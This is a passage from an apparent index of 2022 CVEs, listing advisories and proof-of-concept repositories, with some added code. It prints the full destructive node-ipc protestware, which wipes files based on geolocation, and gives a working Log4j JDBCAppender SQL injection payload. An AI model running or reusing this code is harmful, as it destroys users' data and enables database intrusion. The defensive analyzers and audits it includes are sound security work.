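IP_MAX_HDR = 60     # IHL is a 4-bit count of 32-bit words, so at most 15 * 4 bytes
ICMP_HDR = 8        # type, code, checksum, rest of header


def ip_header_len(pkt: bytes, off: int = 0) -> int:
    """Header length in bytes from the IHL nibble, rejecting truncated or bogus input."""
    if len(pkt) - off < IP_FIXED_HDR:
        raise ValueError("truncated IP header")
    hlen = (pkt[off] & 0x0F) * 4
    if hlen < IP_FIXED_HDR or len(pkt) - off < hlen:
        raise ValueError("invalid IHL")
    return hlen


def blind_copy_overflow(hlen: int, dst_size: int = IP_FIXED_HDR) -> int:
    """Bytes written past a fixed-size destination when hlen header bytes are
    copied without first comparing hlen to the destination size."""
    return max(hlen - dst_size, 0)


def analyze_icmp_error(pkt: bytes, dst_size: int = IP_FIXED_HDR) -> dict:
    """Walk outer IP -> ICMP -> quoted IP -> quoted ICMP, as pr_pack() must, and
    report how far a blind copy of each IP header would overrun dst_size."""
    outer = ip_header_len(pkt)
    if len(pkt) < outer + ICMP_HDR:
        raise ValueError("truncated ICMP header")
    quoted_off = outer + ICMP_HDR
    quoted = ip_header_len(pkt, quoted_off)
    if len(pkt) < quoted_off + quoted + ICMP_HDR:
        raise ValueError("truncated quoted ICMP header")
    return {
        "outer_hlen": outer,
        "quoted_hlen": quoted,
        "outer_overflow": blind_copy_overflow(outer, dst_size),
        "quoted_overflow": blind_copy_overflow(quoted, dst_size),
    }


def build_ip_header(ihl_words: int, proto: int, payload_len: int) -> bytes:
    """Constructed IPv4 header padded with NOP (0x01) options up to ihl_words * 4 bytes."""
    hlen = ihl_words * 4
    fixed = struct.pack("!BBHHHBBH4s4s", 0x40 | ihl_words, 0, hlen + payload_len,
                        0, 0, 64, proto, 0, bytes([192, 0, 2, 1]), bytes([192, 0, 2, 2]))
    return fixed + b"\x01" * (hlen - IP_FIXED_HDR)


def sample_packet(ihl_words: int = 15) -> bytes:
    """Constructed ICMP Time Exceeded (type 11) quoting an Echo Request (type 8)."""
    quoted_icmp = struct.pack("!BBHHH", 8, 0, 0, 0x1234, 1)
    quoted_ip = build_ip_header(ihl_words, 1, len(quoted_icmp))
    icmp = struct.pack("!BBHI", 11, 0, 0, 0)
    outer_ip = build_ip_header(ihl_words, 1, len(icmp) + len(quoted_ip) + len(quoted_icmp))
    return outer_ip + icmp + quoted_ip + quoted_icmp


if __name__ == "__main__":
    print(analyze_icmp_error(sample_packet(15)))               # 40-byte overrun for each header
    print(analyze_icmp_error(sample_packet(15), IP_MAX_HDR))   # a 60-byte buffer: no overrun
```

In C the equivalent check is to size the destination for the maximum header (`IP_MAX_HDR`) or to refuse to copy when `hlen` exceeds the buffer, before any `memcpy` of `hlen` bytes; the same check must be applied a second time to the quoted packet.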

### CVE-2022-23131 (2022-01-13)

In the case of instances where the SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor, because a user login stored in the session was not verified. A malicious unauthenticated actor may exploit this issue to escalate privileges and gain admin access to Zabbix Frontend. To perform the attack, SAML authentication is required to be enabled and the actor has to know the username of a Zabbix user (or use the guest account, which is disabled by default).

- [qq1549176285/CVE-2022-23131](https://github.com/qq1549176285/CVE-2022-23131)
- [jweny/CVE-2022-23131](https://github.com/jweny/CVE-2022-23131)
- [Mr-xn/cve-2022-23131](https://github.com/Mr-xn/cve-2022-23131)
- [1mxml/CVE-2022-23131](https://github.com/1mxml/CVE-2022-23131)
- [zwjjustdoit/cve-2022-23131](https://github.com/zwjjustdoit/cve-2022-23131)
- [L0ading-x/cve-2022-23131](https://github.com/L0ading-x/cve-2022-23131)
- [random-robbie/cve-2022-23131-exp](https://github.com/random-robbie/cve-2022-23131-exp)
- [trganda/CVE-2022-23131](https://github.com/trganda/CVE-2022-23131)
- [pykiller/CVE-2022-23131](https://github.com/pykiller/CVE-2022-23131)
- [Fa1c0n35/zabbix-cve-2022-23131](https://github.com/Fa1c0n35/zabbix-cve-2022-23131)
- [kh4sh3i/CVE-2022-23131](https://github.com/kh4sh3i/CVE-2022-23131)
- [Kazaf6s/CVE-2022-23131](https://github.com/Kazaf6s/CVE-2022-23131)
- [SCAMagic/CVE-2022-23131poc-exp-zabbix-](https://github.com/SCAMagic/CVE-2022-23131poc-exp-zabbix-)
- [Vulnmachines/Zabbix-CVE-2022-23131](https://github.com/Vulnmachines/Zabbix-CVE-2022-23131)
- [wr0x00/cve-2022-23131](https://github.com/wr0x00/cve-2022-23131)
- [Arrnitage/CVE-2022-23131_exp](https://github.com/Arrnitage/CVE-2022-23131_exp)
- [clearcdq/Zabbix-SAML-SSO-_CVE-2022-23131](https://github.com/clearcdq/Zabbix-SAML-SSO-_CVE-2022-23131)
- [r10lab/CVE-2022-23131](https://github.com/r10lab/CVE-2022-23131)
- [fork-bombed/CVE-2022-23131](https://github.com/fork-bombed/CVE-2022-23131)
- [davidzzo23/CVE-2022-23131](https://github.com/davidzzo23/CVE-2022-23131)

### CVE-2022-23222 (2022-01-14)

kernel/bpf/verifier.c in the Linux kernel through 5.15.14 allows local users to gain privileges because of the availability of pointer arithmetic via certain *_OR_NULL pointer types.

- [tr3ee/CVE-2022-23222](https://github.com/tr3ee/CVE-2022-23222)
- [PenteraIO/CVE-2022-23222-POC](https://github.com/PenteraIO/CVE-2022-23222-POC)
- [FridayOrtiz/CVE-2022-23222](https://github.com/FridayOrtiz/CVE-2022-23222)
- [LeoMarche/ProjetSecu](https://github.com/LeoMarche/ProjetSecu)

### CVE-2022-23253 (2022-03-09)

Windows Point-to-Point Tunneling Protocol Denial of Service Vulnerability

- [nettitude/CVE-2022-23253-PoC](https://github.com/nettitude/CVE-2022-23253-PoC)

### CVE-2022-23270 (2022-05-10)

Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability

- [corelight/CVE-2022-23270-PPTP](https://github.com/corelight/CVE-2022-23270-PPTP)

### CVE-2022-23277 (2022-03-09)

Microsoft Exchange Server Remote Code Execution Vulnerability

- [7BitsTeam/CVE-2022-23277](https://github.com/7BitsTeam/CVE-2022-23277)

### CVE-2022-23303 (2022-01-17)

The implementations of SAE in hostapd before 2.10 and wpa_supplicant before 2.10 are vulnerable to side channel attacks as a result of cache access patterns. NOTE: this issue exists because of an incomplete fix for CVE-2019-9494.

- [skulkarni-mv/hostapd_mirror](https://github.com/skulkarni-mv/hostapd_mirror)

### CVE-2022-23305 (2022-01-18)

By design, the JDBCAppender in Log4j 1.2.x accepts an SQL statement as a configuration parameter where the values to be inserted are converters from PatternLayout. The message converter, %m, is likely to always be included. This allows attackers to manipulate the SQL by entering crafted strings into input fields or headers of an application that are logged allowing unintended SQL queries to be executed. Note this issue only affects Log4j 1.x when specifically configured to use the JDBCAppender, which is not the default. Beginning in version 2.0-beta8, the JDBCAppender was re-introduced with proper support for parameterized SQL queries and further customization over the columns written to in logs. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.

- [HynekPetrak/log4shell-finder](https://github.com/HynekPetrak/log4shell-finder)
- [AlphabugX/CVE-2022-RCE](https://github.com/AlphabugX/CVE-2022-RCE)
- [tkomlodi/CVE-2022-23305_POC](https://github.com/tkomlodi/CVE-2022-23305_POC)
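
What the `%m` converter does to the appender's SQL, as an added example that is not Log4j code: a PatternLayout-style template is filled in by plain string substitution, so a logged message that closes the string literal becomes part of the statement. The in-memory SQLite schema, the template and the attacker string are constructed; the comparison is against a parameterized insert of the kind Log4j 2's JDBCAppender uses.

```python
# Added example (not Log4j code): what a JDBCAppender-style INSERT built from a
# PatternLayout with %m does with a logged string (CVE-2022-23305), next to the
# parameterized insert that Log4j 2's appender uses instead.
import sqlite3

# Constructed Log4j 1.x-style `sql` configuration value; %p and %m are substituted as text.
SQL_TEMPLATE = "INSERT INTO logs (level, message) VALUES ('%p', '%m')"


def render_sql(template: str, level: str, message: str) -> str:
    """Plain PatternLayout-style substitution: no quoting, no escaping."""
    return template.replace("%p", level).replace("%m", message)


def new_db() -> sqlite3.Connection:
    """In-memory database with a log table and a second table the attacker wants to read."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE logs (level TEXT, message TEXT);"
        "CREATE TABLE users (name TEXT, role TEXT);"
        "INSERT INTO users VALUES ('alice', 'admin');"
    )
    return conn


def log_vulnerable(conn: sqlite3.Connection, level: str, message: str) -> None:
    """JDBCAppender-style: execute the rendered statement as one string."""
    conn.execute(render_sql(SQL_TEMPLATE, level, message))


def log_parameterized(conn: sqlite3.Connection, level: str, message: str) -> None:
    """Bound parameters: the message is data, whatever it contains."""
    conn.execute("INSERT INTO logs (level, message) VALUES (?, ?)", (level, message))


def stored_messages(conn: sqlite3.Connection) -> list:
    return [row[0] for row in conn.execute("SELECT message FROM logs")]


# Constructed attacker input, e.g. a User-Agent header the application logs verbatim.
# It closes the string literal and splices a subquery into the logged value, so the
# contents of another table end up in the log row without needing stacked queries.
PAYLOAD = "' || (SELECT name || ':' || role FROM users) || '"


def demo() -> tuple:
    vulnerable, safe = new_db(), new_db()
    log_vulnerable(vulnerable, "INFO", PAYLOAD)
    log_parameterized(safe, "INFO", PAYLOAD)
    return stored_messages(vulnerable), stored_messages(safe)


if __name__ == "__main__":
    print(demo())
```

The single-statement form is deliberate: whether a second, stacked statement would also run depends on the JDBC driver, but the expression-level injection shown here works with one `Statement.execute` and is enough to read or alter data the logging account can reach.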

### CVE-2022-23342 (2022-06-21)

The Hyland Onbase Application Server releases prior to 20.3.58.1000 and OnBase releases 21.1.1.1000 through 21.1.15.1000 are vulnerable to a username enumeration vulnerability. An attacker can obtain valid users based on the response returned for invalid and valid users by sending a POST login request to the /mobilebroker/ServiceToBroker.svc/Json/Connect endpoint. This can lead to user enumeration against the underlying Active Directory integrated systems.

- [InitRoot/CVE-2022-23342](https://github.com/InitRoot/CVE-2022-23342)

### CVE-2022-23361
- [ViNi0608/CVE-2022-23361](https://github.com/ViNi0608/CVE-2022-23361)

### CVE-2022-23378 (2022-02-09)

A Cross-Site Scripting (XSS) vulnerability exists within the 3.2.2 version of TastyIgniter. The "items%5B0%5D%5Bpath%5D" parameter of a request made to /admin/allergens/edit/1 is vulnerable.

- [TheGetch/CVE-2022-23378](https://github.com/TheGetch/CVE-2022-23378)

### CVE-2022-23529
- [despossivel/CVE-2022-23529-lab](https://github.com/despossivel/CVE-2022-23529-lab)
- [hackintoanetwork/CVE-2022-23529-PoC](https://github.com/hackintoanetwork/CVE-2022-23529-PoC)

### CVE-2022-23614 (2022-02-04)

Twig is an open source template language for PHP. When in a sandbox mode, the `arrow` parameter of the `sort` filter must be a closure to avoid attackers being able to run arbitrary PHP functions. In affected versions this constraint was not properly enforced and could lead to code injection of arbitrary PHP code. Patched versions now disallow calling non Closure in the `sort` filter as is the case for some other filters. Users are advised to upgrade.

- [davwwwx/CVE-2022-23614](https://github.com/davwwwx/CVE-2022-23614)
- [4rtamis/CVE-2022-23614](https://github.com/4rtamis/CVE-2022-23614)

### CVE-2022-23642 (2022-02-18)

Sourcegraph is a code search and navigation engine. Sourcegraph prior to version 3.37 is vulnerable to remote code execution in the `gitserver` service. The service acts as a git exec proxy, and fails to properly restrict calling `git config`. This allows an attacker to set the git `core.sshCommand` option, which sets git to use the specified command instead of ssh when they need to connect to a remote system. Exploitation of this vulnerability depends on how Sourcegraph is deployed. An attacker able to make HTTP requests to internal services like gitserver is able to exploit it. This issue is patched in Sourcegraph version 3.37. As a workaround, ensure that requests to gitserver are properly protected.

- [Altelus1/CVE-2022-23642](https://github.com/Altelus1/CVE-2022-23642)

### CVE-2022-23648 (2022-03-03)

containerd is a container runtime available as a daemon for Linux and Windows. A bug was found in containerd prior to versions 1.6.1, 1.5.10, and 1.4.12 where containers launched through containerd’s CRI implementation on Linux with a specially-crafted image configuration could gain access to read-only copies of arbitrary files and directories on the host. This may bypass any policy-based enforcement on container setup (including a Kubernetes Pod Security Policy) and expose potentially sensitive information. Kubernetes and crictl can both be configured to use containerd’s CRI implementation. This bug has been fixed in containerd 1.6.1, 1.5.10, and 1.4.12. Users should update to these versions to resolve the issue.

- [raesene/CVE-2022-23648-POC](https://github.com/raesene/CVE-2022-23648-POC)

### CVE-2022-23731 (2022-03-11)

V8 javascript engine (heap vulnerability) can cause privilege escalation, which can impact some webOS TV models.

- [DavidBuchanan314/WAMpage](https://github.com/DavidBuchanan314/WAMpage)

### CVE-2022-23773 (2022-02-11)

cmd/go in Go before 1.16.14 and 1.17.x before 1.17.7 can misinterpret branch names that falsely appear to be version tags. This can lead to incorrect access control if an actor is supposed to be able to create branches but not tags.

- [danbudris/CVE-2022-23773-repro](https://github.com/danbudris/CVE-2022-23773-repro)
- [danbudris/CVE-2022-23773-repro-target](https://github.com/danbudris/CVE-2022-23773-repro-target)
- [YouShengLiu/CVE-2022-23773-Reproduce](https://github.com/YouShengLiu/CVE-2022-23773-Reproduce)

### CVE-2022-23779 (2022-03-02)

Zoho ManageEngine Desktop Central before 10.1.2137.8 exposes the installed server name to anyone. The internal hostname can be discovered by reading HTTP redirect responses.

- [fbusr/CVE-2022-23779](https://github.com/fbusr/CVE-2022-23779)
- [Vulnmachines/Zoho_CVE-2022-23779](https://github.com/Vulnmachines/Zoho_CVE-2022-23779)

### CVE-2022-23808 (2022-01-22)

An issue was discovered in phpMyAdmin 5.1 before 5.1.2. An attacker can inject malicious code into aspects of the setup script, which can allow XSS or HTML injection.

- [dipakpanchal05/CVE-2022-23808](https://github.com/dipakpanchal05/CVE-2022-23808)

### CVE-2022-23812 (2022-03-16)

This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code that targets users with an IP located in Russia or Belarus and overwrites their files with a heart emoji. **Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package, which includes potentially undesired behavior.

Malicious code (**Note:** don't run it!):

```js
import u from "path";
import a from "fs";
import o from "https";
setTimeout(function () {
  const t = Math.round(Math.random() * 4);
  if (t > 1) { return; }
  const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154
  o.get(n.toString("utf8"), function (t) {
    t.on("data", function (t) {
      const n = Buffer.from("Li8=", "base64");            // "./"
      const o = Buffer.from("Li4v", "base64");            // "../"
      const r = Buffer.from("Li4vLi4v", "base64");        // "../../"
      const f = Buffer.from("Lw==", "base64");            // "/"
      const c = Buffer.from("Y291bnRyeV9uYW1l", "base64"); // "country_name"
      const e = Buffer.from("cnVzc2lh", "base64");        // "russia"
      const i = Buffer.from("YmVsYXJ1cw==", "base64");    // "belarus"
      try {
        const s = JSON.parse(t.toString("utf8"));
        const u = s[c.toString("utf8")].toLowerCase();
        const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // checks if country is Russia or Belarus
        if (a) {
          h(n.toString("utf8"));
          h(o.toString("utf8"));
          h(r.toString("utf8"));
          h(f.toString("utf8"));
        }
      } catch (t) {}
    });
  });
}, Math.ceil(Math.random() * 1e3));
async function h(n = "", o = "") {
  if (!a.existsSync(n)) { return; }
  let r = [];
  try { r = a.readdirSync(n); } catch (t) {}
  const f = [];
  const c = Buffer.from("4p2k77iP", "base64"); // "❤️"
  for (var e = 0; e < r.length; e++) {
    const i = u.join(n, r[e]);
    let t = null;
    try { t = a.lstatSync(i); } catch (t) { continue; }
    if (t.isDirectory()) {
      const s = h(i, o);
      s.length > 0 ? f.push(...s) : null;
    } else if (i.indexOf(o) >= 0) {
      try {
        a.writeFile(i, c.toString("utf8"), function () {}); // overwrites file with ❤️
      } catch (t) {}
    }
  }
  return f;
}
const ssl = true;
export { ssl as default, ssl };
```

- [scriptzteam/node-ipc-malware-protestware-CVE-2022-23812](https://github.com/scriptzteam/node-ipc-malware-protestware-CVE-2022-23812)
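A lockfile audit for the version ranges named above, added here as an example; it is not part of the node-ipc project or of the PoC repository linked. It walks the `packages` map of a package-lock.json (lockfileVersion 2 or 3) and flags node-ipc copies in the 10.1.1 to 10.1.2 range, copies at 11.0.0 or later (which pull in peacenotwar), and any peacenotwar package present anywhere in the tree. The `SAMPLE_LOCK` data is constructed for the example, and the version comparison ignores pre-release tags.

```javascript
"use strict";

// Constructed sample of a package-lock.json ("packages" map of lockfileVersion 2/3);
// not taken from any real project.
const SAMPLE_LOCK = {
  name: "example-app",
  lockfileVersion: 3,
  packages: {
    "": { name: "example-app", version: "1.0.0" },
    "node_modules/node-ipc": { version: "10.1.2" },
    "node_modules/some-tool": { version: "3.4.0" },
    "node_modules/some-tool/node_modules/node-ipc": { version: "11.1.0" },
    "node_modules/peacenotwar": { version: "9.1.6" },
    "node_modules/lodash": { version: "4.17.21" },
  },
};

// Compare two dotted numeric versions. Pre-release suffixes are dropped; that is
// enough for the ranges in the advisory.
function compareVersions(a, b) {
  const pa = a.split("-")[0].split(".").map(Number);
  const pb = b.split("-")[0].split(".").map(Number);
  for (let i = 0; i < Math.max(pa.length, pb.length); i++) {
    const x = pa[i] || 0;
    const y = pb[i] || 0;
    if (x !== y) return x < y ? -1 : 1;
  }
  return 0;
}

// Ranges from the advisory text: malicious code shipped directly in >=10.1.1 <10.1.3;
// 11.0.0 and later import the peacenotwar package instead.
function classifyNodeIpc(version) {
  if (compareVersions(version, "10.1.1") >= 0 && compareVersions(version, "10.1.3") < 0) {
    return "malicious-inline";
  }
  if (compareVersions(version, "11.0.0") >= 0) {
    return "imports-peacenotwar";
  }
  return null;
}

// Walk every installed package (including nested node_modules copies) and report
// affected node-ipc versions and any peacenotwar package.
function auditLock(lock) {
  const findings = [];
  for (const [installPath, meta] of Object.entries(lock.packages || {})) {
    if (installPath === "" || !meta.version) continue; // root project entry
    const name = installPath.split("node_modules/").pop();
    if (name === "node-ipc") {
      const verdict = classifyNodeIpc(meta.version);
      if (verdict) findings.push({ path: installPath, version: meta.version, reason: verdict });
    } else if (name === "peacenotwar") {
      findings.push({ path: installPath, version: meta.version, reason: "peacenotwar-present" });
    }
  }
  return findings;
}

for (const f of auditLock(SAMPLE_LOCK)) {
  console.log(`${f.path}@${f.version}: ${f.reason}`);
}
```

To audit a real project, replace `SAMPLE_LOCK` with `JSON.parse(fs.readFileSync("package-lock.json", "utf8"))`; lockfileVersion 1 files use a nested `dependencies` tree instead of `packages` and would need a different walker.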

### CVE-2022-23852 (2022-01-24)

Expat (aka libexpat) before 2.4.4 has a signed integer overflow in XML_GetBuffer, for configurations with a nonzero XML_CONTEXT_BYTES.

- [Satheesh575555/external_expat_AOSP10_r33_CVE-2022-23852](https://github.com/Satheesh575555/external_expat_AOSP10_r33_CVE-2022-23852)

### CVE-2022-23861
- [mbadanoiu/CVE-2022-23861](https://github.com/mbadanoiu/CVE-2022-23861)

### CVE-2022-23862
- [mbadanoiu/CVE-2022-23862](https://github.com/mbadanoiu/CVE-2022-23862)

### CVE-2022-23884 (2022-03-28)

Mojang Bedrock Dedicated Server 1.18.2 is affected by an integer overflow leading to a bound check bypass caused by PurchaseReceiptPacket::_read (packet deserializer).

- [nanaao/CVE-2022-23884](https://github.com/nanaao/CVE-2022-23884)

### CVE-2022-23909 (2022-04-05)

There is an unquoted service path in Sherpa Connector Service (SherpaConnectorService.exe) 2020.2.20328.2050. This might allow a local user to escalate privileges by creating a "C:\Program Files\Sherpa Software\Sherpa.exe" file.

- [netsectuna/CVE-2022-23909](https://github.com/netsectuna/CVE-2022-23909)

### CVE-2022-23935 (2022-01-25)

lib/Image/ExifTool.pm in ExifTool before 12.38 mishandles a $file =~ /\|$/ check, leading to command injection.

- [dpbe32/CVE-2022-23935-PoC-Exploit](https://github.com/dpbe32/CVE-2022-23935-PoC-Exploit)
- [cowsecurity/CVE-2022-23935](https://github.com/cowsecurity/CVE-2022-23935)
- [BKreisel/CVE-2022-23935](https://github.com/BKreisel/CVE-2022-23935)

### CVE-2022-23940 (2022-03-07)

SuiteCRM through 7.12.1 and 8.x through 8.0.1 allows Remote Code Execution. Authenticated users with access to the Scheduled Reports module can achieve this by leveraging PHP deserialization in the email_recipients property. By using a crafted request, they can create a malicious report, containing a PHP-deserialization payload in the email_recipients field. Once someone accesses this report, the backend will deserialize the content of the email_recipients field and the payload gets executed. Project dependencies include a number of interesting PHP deserialization gadgets (e.g., Monolog/RCE1 from phpggc) that can be used for Code Execution.

- [manuelz120/CVE-2022-23940](https://github.com/manuelz120/CVE-2022-23940)

### CVE-2022-23967
- [MaherAzzouzi/CVE-2022-23967](https://github.com/MaherAzzouzi/CVE-2022-23967)

### CVE-2022-23988 (2022-02-28)

The WS Form LITE and Pro WordPress plugins before 1.8.176 do not sanitise and escape submitted form data, allowing an unauthenticated attacker to submit XSS payloads which will get executed when a privileged user views the related submission.

- [simonepetruzzi/WebSecurityProject](https://github.com/simonepetruzzi/WebSecurityProject)

### CVE-2022-23990 (2022-01-26)

Expat (aka libexpat) before 2.4.4 has an integer overflow in the doProlog function.

- [Satheesh575555/external_expat_AOSP10_r33_CVE-2022-23990](https://github.com/Satheesh575555/external_expat_AOSP10_r33_CVE-2022-23990)

### CVE-2022-24086 (2022-02-16)

Adobe Commerce versions 2.4.3-p1 (and earlier) and 2.3.7-p2 (and earlier) are affected by an improper input validation vulnerability during the checkout process. Exploitation of this issue does not require user interaction and could result in arbitrary code execution.

- [Mr-xn/CVE-2022-24086](https://github.com/Mr-xn/CVE-2022-24086)
- [nanaao/CVE-2022-24086-RCE](https://github.com/nanaao/CVE-2022-24086-RCE)
- [NHPT/CVE-2022-24086-RCE](https://github.com/NHPT/CVE-2022-24086-RCE)
- [oK0mo/CVE-2022-24086-RCE-PoC](https://github.com/oK0mo/CVE-2022-24086-RCE-PoC)
- [seymanurmutlu/CVE-2022-24086-CVE-2022-24087](https://github.com/seymanurmutlu/CVE-2022-24086-CVE-2022-24087)
- [akr3ch/CVE-2022-24086](https://github.com/akr3ch/CVE-2022-24086)
- [pescepilota/CVE-2022-24086](https://github.com/pescepilota/CVE-2022-24086)
- [BurpRoot/CVE-2022-24086](https://github.com/BurpRoot/CVE-2022-24086)

### CVE-2022-24087
- [Neimar47574/CVE-2022-24087](https://github.com/Neimar47574/CVE-2022-24087)

### CVE-2022-24112 (2022-02-11)

An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed.

- [Mr-xn/CVE-2022-24112](https://github.com/Mr-xn/CVE-2022-24112)
- [CrackerCat/CVE-2022-24112](https://github.com/CrackerCat/CVE-2022-24112)
- [Axx8/CVE-2022-24112](https://github.com/Axx8/CVE-2022-24112)
- [Mah1ndra/CVE-2022-24112](https://github.com/Mah1ndra/CVE-2022-24112)
- [M4xSec/Apache-APISIX-CVE-2022-24112](https://github.com/M4xSec/Apache-APISIX-CVE-2022-24112)
- [kavishkagihan/CVE-2022-24112-POC](https://github.com/kavishkagihan/CVE-2022-24112-POC)
- [twseptian/cve-2022-24112](https://github.com/twseptian/cve-2022-24112)
- [Acczdy/CVE-2022-24112_POC](https://github.com/Acczdy/CVE-2022-24112_POC)
- [wshepherd0010/CVE-2022-24112-Lab](https://github.com/wshepherd0010/CVE-2022-24112-Lab)
- [btar1gan/exploit_CVE-2022-24112](https://github.com/btar1gan/exploit_CVE-2022-24112)

### CVE-2022-24122 (2022-01-29)

kernel/ucount.c in the Linux kernel 5.14 through 5.16.4, when unprivileged user namespaces are enabled, allows a use-after-free and privilege escalation because a ucounts object can outlive its namespace.

- [meowmeowxw/CVE-2022-24122](https://github.com/meowmeowxw/CVE-2022-24122)

### CVE-2022-24124 (2022-01-29)

The query API in Casdoor before 1.13.1 has a SQL injection vulnerability related to the field and value parameters, as demonstrated by api/get-organizations.

- [ColdFusionX/CVE-2022-24124](https://github.com/ColdFusionX/CVE-2022-24124)
- [0xAbbarhSF/CVE-2022-24124](https://github.com/0xAbbarhSF/CVE-2022-24124)
- [b1gdog/CVE-2022-24124](https://github.com/b1gdog/CVE-2022-24124)

### CVE-2022-24125 (2022-03-20)

The matchmaking servers of Bandai Namco FromSoftware Dark Souls III through 2022-03-19 allow remote attackers to send arbitrary push requests to clients via a RequestSendMessageToPlayers request. For example, ability to send a push message to hundreds of thousands of machines is only restricted on the client side, and can thus be bypassed with a modified client.

- [tremwil/ds3-nrssr-rce](https://github.com/tremwil/ds3-nrssr-rce)

### CVE-2022-24181 (2022-04-01)

Cross-site scripting (XSS) via Host Header injection in PKP Open Journals System 2.4.8 >= 3.3 allows remote attackers to inject arbitrary code via the X-Forwarded-Host Header.

- [cyberhawk000/CVE-2022-24181](https://github.com/cyberhawk000/CVE-2022-24181)

### CVE-2022-24227 (2022-02-15)

A cross-site scripting (XSS) vulnerability in BoltWire v7.10 and v8.00 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the name and lastname parameters.

- [Cyber-Wo0dy/CVE-2022-24227-updated](https://github.com/Cyber-Wo0dy/CVE-2022-24227-updated)

### CVE-2022-24342 (2022-02-25)

In JetBrains TeamCity before 2021.2.1, URL injection leading to CSRF was possible.

- [yuriisanin/CVE-2022-24342](https://github.com/yuriisanin/CVE-2022-24342)

### CVE-2022-24348 (2022-02-04)

Argo CD before 2.1.9 and 2.2.x before 2.2.4 allows directory traversal related to Helm charts because of an error in helmTemplate in repository.go. For example, an attacker may be able to discover credentials stored in a YAML file.

- [jkroepke/CVE-2022-24348-2](https://github.com/jkroepke/CVE-2022-24348-2)

### CVE-2022-24439 (2022-12-12)

All versions of package gitpython are vulnerable to Remote Code Execution (RCE) due to improper user input validation, which makes it possible to inject a maliciously crafted remote URL into the clone command. Exploiting this vulnerability is possible because the library makes external calls to git without sufficient sanitization of input arguments.

- [muhammadhendro/CVE-2022-24439](https://github.com/muhammadhendro/CVE-2022-24439)

### CVE-2022-24442 (2022-02-25)

JetBrains YouTrack before 2021.4.40426 was vulnerable to SSTI (Server-Side Template Injection) via FreeMarker templates.

- [mbadanoiu/CVE-2022-24442](https://github.com/mbadanoiu/CVE-2022-24442)

### CVE-2022-24449 (2022-04-28)

Solar appScreener through 3.10.4, when a valid license is not present, allows XXE and SSRF attacks via a crafted XML document.

- [jet-pentest/CVE-2022-24449](https://github.com/jet-pentest/CVE-2022-24449)

### CVE-2022-24481 (2022-04-15)

Windows Common Log File System Driver Elevation of Privilege Vulnerability

- [fr4nkxixi/CVE-2022-24481-POC](https://github.com/fr4nkxixi/CVE-2022-24481-POC)

### CVE-2022-24483 (2022-04-15)

Windows Kernel Information Disclosure Vulnerability

- [waleedassar/CVE-2022-24483](https://github.com/waleedassar/CVE-2022-24483)

### CVE-2022-24491 (2022-04-15)

Windows Network File System Remote Code Execution Vulnerability

- [corelight/CVE-2022-24491](https://github.com/corelight/CVE-2022-24491)

### CVE-2022-24494 (2022-04-15)

Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability

- [vportal/AFD](https://github.com/vportal/AFD)

### CVE-2022-24497 (2022-04-15)

Windows Network File System Remote Code Execution Vulnerability

- [corelight/CVE-2022-24497](https://github.com/corelight/CVE-2022-24497)

### CVE-2022-24500 (2022-04-15)

Windows SMB Remote Code Execution Vulnerability

- [0xZipp0/CVE-2022-24500](https://github.com/0xZipp0/CVE-2022-24500)

### CVE-2022-24611 (2022-05-17)

Denial of Service (DoS) in the Z-Wave S0 NonceGet protocol specification in Silicon Labs Z-Wave 500 series allows local attackers to block S0/S2 protected Z-Wave networks via crafted S0 NonceGet Z-Wave packets, utilizing included but absent NodeIDs.

- [ITSecLab-HSEL/CVE-2022-24611](https://github.com/ITSecLab-HSEL/CVE-2022-24611)

### CVE-2022-24637 (2022-03-18)

Open Web Analytics (OWA) before 1.7.4 allows an unauthenticated remote attacker to obtain sensitive user information, which can be used to gain admin privileges by leveraging cache hashes. This occurs because files generated with '<?php (instead of the intended "<?php sequence) aren't handled by the PHP interpreter.

- [JacobEbben/CVE-2022-24637](https://github.com/JacobEbben/CVE-2022-24637)
- [Lay0us/CVE-2022-24637](https://github.com/Lay0us/CVE-2022-24637)
- [hupe1980/CVE-2022-24637](https://github.com/hupe1980/CVE-2022-24637)
- [icebreack/CVE-2022-24637](https://github.com/icebreack/CVE-2022-24637)
- [Pflegusch/CVE-2022-24637](https://github.com/Pflegusch/CVE-2022-24637)
- [0xM4hm0ud/CVE-2022-24637](https://github.com/0xM4hm0ud/CVE-2022-24637)
- [0xRyuk/CVE-2022-24637](https://github.com/0xRyuk/CVE-2022-24637)

### CVE-2022-24644 (2022-03-07)

ZZ Inc. KeyMouse Windows 3.08 and prior is affected by a remote code execution vulnerability during an unauthenticated update. To exploit this vulnerability, a user must trigger an update of an affected installation of KeyMouse.

- [gerr-re/cve-2022-24644](https://github.com/gerr-re/cve-2022-24644)
- [ThanhThuy2908/ATHDH_CVE_2022_24644](https://github.com/ThanhThuy2908/ATHDH_CVE_2022_24644)

### CVE-2022-24654 (2022-08-15)

Authenticated stored cross-site scripting (XSS) vulnerability in "Field Server Address" field in INTELBRAS ATA 200 Firmware 74.19.10.21 allows attackers to inject JavaScript code through a crafted payload.

- [leonardobg/CVE-2022-24654](https://github.com/leonardobg/CVE-2022-24654)

### CVE-2022-24675 (2022-04-20)

encoding/pem in Go before 1.17.9 and 1.18.x before 1.18.1 has a Decode stack overflow via a large amount of PEM data.

- [jfrog/jfrog-CVE-2022-24675](https://github.com/jfrog/jfrog-CVE-2022-24675)

### CVE-2022-24693 (2022-03-30)

